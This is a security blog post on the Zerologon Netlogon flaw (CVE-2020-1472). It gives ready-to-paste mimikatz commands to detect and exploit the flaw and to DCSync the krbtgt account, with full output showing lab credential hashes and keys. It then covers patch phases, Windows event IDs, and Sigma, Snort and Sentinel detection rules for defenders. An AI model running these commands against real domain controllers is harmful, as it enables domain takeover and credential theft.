CVE-2020-1472 aka Zerologon
TLDR
The Zerologon vulnerability allows an attacker with network access to a Windows Domain Controller to quickly and reliably take complete control of the Windows domain. As such, it is a perfect vulnerability for any attacker and a nightmare for defenders. It was discovered by Tom Tervoort, a security researcher at Secura and privately reported to Microsoft, which issued a patch for supported Windows versions as part of August 2020 updates and assigned it CVE-2020-1472.
Introduction
Netscylla has been busy investigating the exploit on different systems, testing different Proof-of-Concept exploits. Often real-world systems behave differently, and unintended consequences can happen.
Exploit
Affected Systems
- Windows 2008 RC2 64bit
- Windows 2012
- Windows 2016
- Windows 2019
- Windows 1903/1909/2004
PoCs
- https://github.com/dirkjanm/CVE-2020-1472
- https://github.com/VoidSec/CVE-2020-1472
- https://github.com/gentilkiwi/mimikatz
Note: for the python PoCs to work correctly, you’ll need to update impacket:
Using Mimikatz
Commands - for copy n paste ease of use
lsadump::zerologon /target:dc1.exploit.local /account:dc1$
lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit
lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt
Important:
- /target is the full fqdn of the target dc
- /account variable is the name of the dc followed by $
Example Usage:
C:\Users\user\Downloads\Win32>mimikatz.exe
.#####. mimikatz 2.2.0 (x86) #19041 Sep 18 2020 19:18:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # lsadump::zerologon /target:dc1.exploit.local /account:dc1$
Remote : dc1.exploit.local
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : dc1.exploit.local
Account: dc1$
Type : 6 (Server)
Mode : detect
Trying to 'authenticate'...
=========================================================================
NetrServerAuthenticate2: 0x00000000
* Authentication: OK -- vulnerable
mimikatz # lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit
Remote : dc1.exploit.local
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : dc1.exploit.local
Account: dc1$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
===========================================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
mimikatz # lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt
[DC] 'exploit.local' will be the domain
[DC] 'dc1.exploit.local' will be the DC server
[DC] 'krbtgt' will be the user account
[AUTH] Username: dc1$
[AUTH] Domain : exploit.local
[AUTH] Password:
[AUTH] Explicit NTLM Mode
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 22/09/2020 16:12:29
Object Security ID : S-1-5-21-1015760042-408406534-773346051-502
Object Relative ID : 502
Credentials:
Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159
ntlm- 0: 75c424*****************58e088f92
lm - 0: 7c0800*****************df0fa84b0
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 0a17042d1d448f9266f9dafd4a7611cb
* Primary:Kerberos-Newer-Keys *
Default Salt : EXPLOIT.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 810382037847ad39412f0aba970962ddfb796585330b97877a455c9582a05c68
aes128_hmac (4096) : b4c2cd6d8c005525316b006ca3c8cb51
des_cbc_md5 (4096) : 4f45195db5972f3b
* Primary:Kerberos *
Default Salt : EXPLOIT.LOCALkrbtgt
Credentials
des_cbc_md5 : 4f45195db5972f3b
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 1563c7e64e0815b57efcfcb5ae22dc90
02 3d61549adf12841ae05a09460b8edaed
03 fb64dbb289618735c2da07b6a1f702f4
04 1563c7e64e0815b57efcfcb5ae22dc90
05 3d61549adf12841ae05a09460b8edaed
06 1b6e21b21a8fd92ca8bf4d294bfc3f60
07 1563c7e64e0815b57efcfcb5ae22dc90
08 30a7542e7f5a3fa253623ca09c8fae36
09 30a7542e7f5a3fa253623ca09c8fae36
10 87e128fecc1e329456679440174cf983
11 212e2fabaedea53a6027d6a92c2c0d6e
12 30a7542e7f5a3fa253623ca09c8fae36
13 cfc27bc0430086e95ab3426e1d9e7dfd
14 212e2fabaedea53a6027d6a92c2c0d6e
15 5d0fd6579eb09201d85744a7142999d9
16 5d0fd6579eb09201d85744a7142999d9
17 597bdfe4008ee6d70351bd984e23f306
18 f517e48a822e71e63b17c44574fcde13
19 7379256ad109be5d3d8c42a6815730fd
20 6c8ecb285f193bcdf46022426ff5e6a2
21 6bb3bf4cd601b7c44cb36586c70bec82
22 6bb3bf4cd601b7c44cb36586c70bec82
23 4a5cc09043c5089904392f3240fe51a8
24 679dfdf11e1ec5b6a928a1acc30a49b4
25 679dfdf11e1ec5b6a928a1acc30a49b4
26 4517e188beee795177e2a2382b722cf6
27 f6c02a4415a0dad8ccc15f913c4dcf25
28 8b830ad87aab13f3c12a6d8f6eb2a6ae
29 b554dbcba6aebf1931c299a502f35cff
mimikatz #
Results from our testing
Setting up a fresh fully patched 2016 Domain Controller, we were vulnerable and you can see the mimikatz output above.
However, attacking a hardened DC; One where we use a custom authentication GINA from a 3rd party for MFA, and MFA is enforced for all DC User communciation - the exploit failed. The error in our logs was 5805 - Error - the machine failed to autneticate.
We spent time trying to get to the bottom of the error, if it was down to a specific hardening setting, or whether it was the 2FA authentication mechanism. In the end we concluded it was the 3rd Party 2FA software that effected the success of the exploit. Therefore, we conclude that it is always worth testing the legitimacy of an exploit on your own test-domain as real-life system improvements or changes can vastly change the outcome of a successful exploit.
Patches, Updates, am I vulnerable?
Yes you may be patched, but you may be vulnerable. Microsoft released a patch in August CVE-2020-1472. However, if you fully read the advisory, you would know the patch is released in two phases.
- Phase 1 - installs the patch, but does not enforce the fix, it also installs additional EventIDs for logging and debugging purposes
- Phase 2 - February 2021, forces the patch/fix into enforcement mode.
You may also want to read https://support.microsoft.com/en-gb/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
Useful EventIDs: old and new
- Event ID - 4742; A computer account was changed, specifically the action may have been performed by an anonymous logon event.
- Event ID - 5805; A machine account failed to authenticate; Which is usually caused by either multiple instances of the same computer name, or the computer name has not replicated to every domain controller, or the use of a custom GINA.
- Event Code 4624; Notes a successful login to the machine, specifically an event code 4624, followed by an event code of 4724 is triggered when the vulnerability is exploited on hosts.
- Event ID - 4662; If a DCSync attack has been carried out
- Event IDs 5827 and 5828; Connections denied
- Event ID 5829; Whenever a vulnerable Netlogon secure channel connection is allowed.
- Event IDs 5830 and 5831; If connections are allowed by “Domain controller: Allow vulnerable Netlogon secure channel connections” group policy.
- Sysmon Event ID 3; The network connection event logs TCP/UDP connections on the machine. An incoming network connection is made from the attacking machine to the victim Domain Controller to the LSASS process when the Zerologon event occurs
Detection
Soc Prime Sigma Rule:
title: Possible CVE-2020-1472 (zerologon)
description: CVE-2020-1472 (Netlogon Elevation of Privilege Vulnerability) may create thousands of NetrServerReqChallenge & NetrServerAuthenticate3 requests in a short amount of time.
author: SOC Prime Team
date: 2020/09/11
references:
- https://github.com/SecuraBV/CVE-2020-1472
tags:
- attack.lateral_movement
- attack.T1210
logsource:
product: zeek
service: dce_rpc
detection:
selection:
endpoint: 'netlogon'
operation: 'NetrServerReqChallenge'
selection2:
endpoint: 'netlogon'
operation: 'NetrServerAuthenticate3'
timeframe: 1m
condition: selection or selection2 | count() by src_ip > 100
falsepositives:
- 'unknown'
level: high
Snort Rule
alert tcp any any -> [!<domaincontrollers to exclude here] [49152:65535] (msg:"Possible DCSync Detected"; flow:to_server,established; flags:PA; content:"|00 03 10 00 00 00|"; depth:8; content:"|03 00|"; distance:14; classtype:attempted-admin; sid:20166316;)
Azure Sentinel Query
Dce_Rpc | where (endpoint == "netlogon" and (operation == "NetrServerReqChallenge" or operation == "NetrServerAuthenticate3")) | summarize var = count() by SourceIp | where var > 100
Share on: